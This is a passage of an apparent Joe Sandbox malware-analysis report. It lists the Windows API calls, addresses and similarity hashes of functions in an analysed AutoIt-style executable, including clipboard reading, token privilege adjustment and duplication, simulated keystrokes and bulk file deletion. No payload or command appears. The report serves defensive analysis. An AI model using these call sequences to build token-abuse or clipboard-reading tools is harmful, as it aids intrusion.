                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DFFB12
                                                                                                                        • SendMessageW.USER32 ref: 00DFFB3D
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DFFB55
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DFFB60
                                                                                                                        • GetCursorPos.USER32(?), ref: 00DFFB81
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00DFFB8E
                                                                                                                        • GetParent.USER32(?), ref: 00DFFBAA
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DFFC10
                                                                                                                        • SendMessageW.USER32 ref: 00DFFC40
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00DFFC96
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DFFCC2
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DFFCEA
                                                                                                                        • SendMessageW.USER32 ref: 00DFFD0D
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00DFFD57
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DFFD87
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00DFFE1C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                        • API String ID: 3461372671-4164748364
                                                                                                                        • Opcode ID: 64859f525336e8d7cb92dd7e8e3b40b10d05731ddf04f7d2b203fa27f7662ba6
                                                                                                                        • Instruction ID: 08a1b2020d8ffe25392dfa9a0fcf9ddd32fdc7e30e93d93da90b85d4a3d30b66
                                                                                                                        • Opcode Fuzzy Hash: 64859f525336e8d7cb92dd7e8e3b40b10d05731ddf04f7d2b203fa27f7662ba6
                                                                                                                        • Instruction Fuzzy Hash: FA329A70204209AFD724DF24C884BBABBE5FF48354F198A29F695D72A1DB71DD04CB61
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00DFAFDB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: %d/%02d/%02d
                                                                                                                        • API String ID: 3850602802-328681919
                                                                                                                        • Opcode ID: 448d462825c7f7c425b67a56573d98c2837aaf2083fd52ef4e605887af0c18cd
                                                                                                                        • Instruction ID: 336c8c5b89b9409d6e5014677bbf359afccef8392c54c401869bd85408247a4b
                                                                                                                        • Opcode Fuzzy Hash: 448d462825c7f7c425b67a56573d98c2837aaf2083fd52ef4e605887af0c18cd
                                                                                                                        • Instruction Fuzzy Hash: DB12B0B1504208AFEB258F69CC49FBE7BB8EF45310F158219F65AEB291DB708945CB31
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00DAF796
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E04388
                                                                                                                        • IsIconic.USER32(000000FF), ref: 00E04391
                                                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00E0439E
                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00E043A8
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E043BE
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E043C5
                                                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00E043D1
                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00E043E2
                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00E043EA
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E043F2
                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00E043F5
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0440A
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00E04415
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0441F
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00E04424
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0442D
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00E04432
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0443C
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00E04441
                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00E04444
                                                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00E0446B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                        • Opcode ID: 0a74f5fc3243ce7725824a55538b7f52bd0f0ddeb31e164ba713c53f2a3280b2
                                                                                                                        • Instruction ID: d9c68e5bb66995d71807876bb1240ce847488818fc9365ef21649d0f51f4428d
                                                                                                                        • Opcode Fuzzy Hash: 0a74f5fc3243ce7725824a55538b7f52bd0f0ddeb31e164ba713c53f2a3280b2
                                                                                                                        • Instruction Fuzzy Hash: 653181B1A44218BFEB216F729C49FBF3E6DEB44B54F108025FB05BA1D1C6B05D40AAA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D931DA
                                                                                                                          • Part of subcall function 00DD7B9F: __wsplitpath.LIBCMT ref: 00DD7BBC
                                                                                                                          • Part of subcall function 00DD7B9F: __wsplitpath.LIBCMT ref: 00DD7BCF
                                                                                                                          • Part of subcall function 00DD7C0C: GetFileAttributesW.KERNEL32(?,00DD6A7B), ref: 00DD7C0D
                                                                                                                        • _wcscat.LIBCMT ref: 00DD6B9D
                                                                                                                        • _wcscat.LIBCMT ref: 00DD6BBB
                                                                                                                        • __wsplitpath.LIBCMT ref: 00DD6BE2
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00DD6BF8
                                                                                                                        • _wcscpy.LIBCMT ref: 00DD6C57
                                                                                                                        • _wcscat.LIBCMT ref: 00DD6C6A
                                                                                                                        • _wcscat.LIBCMT ref: 00DD6C7D
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00DD6CAB
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00DD6CBC
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00DD6CDB
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00DD6CEA
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00DD6CFF
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00DD6D10
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DD6D37
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00DD6D53
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00DD6D61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 1867810238-1173974218
                                                                                                                        • Opcode ID: f93d9f848482a8e832dc07f6877de24d4ebff1f2bb862e229c6854e615bec63b
                                                                                                                        • Instruction ID: 876ff8a25bd26390f239fa89c082a1cc55cf57c5effaa4dac5b9bc942647c609
                                                                                                                        • Opcode Fuzzy Hash: f93d9f848482a8e832dc07f6877de24d4ebff1f2bb862e229c6854e615bec63b
                                                                                                                        • Instruction Fuzzy Hash: F5511D7290426CAACF21DBA09C44EEE777DAB09300F4845D7E559A2151EB34DB8CCFB1
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32(00E2DBF0), ref: 00DE70C3
                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DE70D1
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00DE70D9
                                                                                                                        • CloseClipboard.USER32 ref: 00DE70E5
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00DE7101
                                                                                                                        • CloseClipboard.USER32 ref: 00DE710B
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00DE7120
                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00DE712D
                                                                                                                        • GetClipboardData.USER32(00000001), ref: 00DE7135
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00DE7142
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00DE7176
                                                                                                                        • CloseClipboard.USER32 ref: 00DE7283
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3222323430-0
                                                                                                                        • Opcode ID: ffdc8279a0572a2fa9e7b5f0abbdba1c5a74bcd7a81ddc21afdf4184b5186a7b
                                                                                                                        • Instruction ID: 7cbdfadc8ec1da5c07524fad06b8488820d3142e41068fec568ef32e5f4d8a72
                                                                                                                        • Opcode Fuzzy Hash: ffdc8279a0572a2fa9e7b5f0abbdba1c5a74bcd7a81ddc21afdf4184b5186a7b
                                                                                                                        • Instruction Fuzzy Hash: 7151BE31208301AFD751FF62DC96FAE77A8EB84B11F048529F656E21E1DB70D9088B72
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DCBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DCBF0F
                                                                                                                          • Part of subcall function 00DCBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DCBF3C
                                                                                                                          • Part of subcall function 00DCBEC3: GetLastError.KERNEL32 ref: 00DCBF49
                                                                                                                        • _memset.LIBCMT ref: 00DCBA34
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00DCBA86
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00DCBA97
                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DCBAAE
                                                                                                                        • GetProcessWindowStation.USER32 ref: 00DCBAC7
                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00DCBAD1
                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DCBAEB
                                                                                                                          • Part of subcall function 00DCB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DCB9EC), ref: 00DCB8C5
                                                                                                                          • Part of subcall function 00DCB8B0: CloseHandle.KERNEL32(?,?,00DCB9EC), ref: 00DCB8D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                        • String ID: $default$winsta0
                                                                                                                        • API String ID: 2063423040-1027155976
                                                                                                                        • Opcode ID: 3358a26f225a63769583ac67e4505d70786f3acc68018990c6714f4175b626cb
                                                                                                                        • Instruction ID: fde45e26c2981e63051553b202f983c55af9a709e0239c0a6f2933b3387017a0
                                                                                                                        • Opcode Fuzzy Hash: 3358a26f225a63769583ac67e4505d70786f3acc68018990c6714f4175b626cb
                                                                                                                        • Instruction Fuzzy Hash: 1E81497190020AAEDF119FA4CD46EEEBBB9EF08324F18851AF915B7160DB31CE159B31
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00DDFE03
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00DDFE57
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DDFE7C
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DDFE93
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DDFEBA
                                                                                                                        • __swprintf.LIBCMT ref: 00DDFF06
                                                                                                                        • __swprintf.LIBCMT ref: 00DDFF3F
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • __swprintf.LIBCMT ref: 00DDFF93
                                                                                                                          • Part of subcall function 00DB234B: __woutput_l.LIBCMT ref: 00DB23A4
                                                                                                                        • __swprintf.LIBCMT ref: 00DDFFE1
                                                                                                                        • __swprintf.LIBCMT ref: 00DE0030
                                                                                                                        • __swprintf.LIBCMT ref: 00DE007F
                                                                                                                        • __swprintf.LIBCMT ref: 00DE00CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                        • API String ID: 108614129-2428617273
                                                                                                                        • Opcode ID: c2c66b325404fc4e726e4020068d7e955b5a1709f38ed6e2ccba5a8e8b818373
                                                                                                                        • Instruction ID: c980b4c018060b0c9c7020363f6bd29fda4ef8e9ce5ab92ac3b4532385fa997f
                                                                                                                        • Opcode Fuzzy Hash: c2c66b325404fc4e726e4020068d7e955b5a1709f38ed6e2ccba5a8e8b818373
                                                                                                                        • Instruction Fuzzy Hash: 43A10BB2408344ABC711EFA5C885DABB7ECEF95700F44492EF596C6151EB34EA48CB72
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00DE2065
                                                                                                                        • _wcscmp.LIBCMT ref: 00DE207A
                                                                                                                        • _wcscmp.LIBCMT ref: 00DE2091
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00DE20A3
                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00DE20BD
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00DE20D5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00DE20E0
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE20FC
                                                                                                                        • _wcscmp.LIBCMT ref: 00DE2123
                                                                                                                        • _wcscmp.LIBCMT ref: 00DE213A
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE214C
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00E43A68), ref: 00DE216A
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE2174
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00DE2181
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00DE2191
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1803514871-438819550
                                                                                                                        • Opcode ID: e70387f464ea164f6125d180804d7e4ade41fdae1d43d0b7e3c5be65ca6ae3aa
                                                                                                                        • Instruction ID: b796e72a6fa9e00d2d42d02425a369fcf884a42b8339986e9786e47063e448b7
                                                                                                                        • Opcode Fuzzy Hash: e70387f464ea164f6125d180804d7e4ade41fdae1d43d0b7e3c5be65ca6ae3aa
                                                                                                                        • Instruction Fuzzy Hash: D731BD32A05359BECB14AFB6EC49EEE73AC9F49320F144056E915F2090DB70DB48CA75
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00DFF14B
                                                                                                                          • Part of subcall function 00DFD5EE: ClientToScreen.USER32(?,?), ref: 00DFD617
                                                                                                                          • Part of subcall function 00DFD5EE: GetWindowRect.USER32(?,?), ref: 00DFD68D
                                                                                                                          • Part of subcall function 00DFD5EE: PtInRect.USER32(?,?,00DFEB2C), ref: 00DFD69D
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00DFF1B4
                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DFF1BF
                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DFF1E2
                                                                                                                        • _wcscat.LIBCMT ref: 00DFF212
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DFF229
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00DFF242
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00DFF259
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00DFF27B
                                                                                                                        • DragFinish.SHELL32(?), ref: 00DFF282
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00DFF36D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                        • API String ID: 2166380349-3440237614
                                                                                                                        • Opcode ID: 8af0d3e272ec3b08273a255a9252d9dbbbe75b7539426f13da531b2f34a69f84
                                                                                                                        • Instruction ID: c1f90115c273e8f669e834fa34ae0b3c717294add7b45aeffed488f2aa388a80
                                                                                                                        • Opcode Fuzzy Hash: 8af0d3e272ec3b08273a255a9252d9dbbbe75b7539426f13da531b2f34a69f84
                                                                                                                        • Instruction Fuzzy Hash: F9615A71508304AFC711EF65DC85EABBBE8FF89750F004A1DF695A21A1DB709A09CB62
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00DE21C0
                                                                                                                        • _wcscmp.LIBCMT ref: 00DE21D5
                                                                                                                        • _wcscmp.LIBCMT ref: 00DE21EC
                                                                                                                          • Part of subcall function 00DD7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DD7621
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00DE221B
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00DE2226
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE2242
                                                                                                                        • _wcscmp.LIBCMT ref: 00DE2269
                                                                                                                        • _wcscmp.LIBCMT ref: 00DE2280
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE2292
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00E43A68), ref: 00DE22B0
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE22BA
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00DE22C7
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00DE22D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
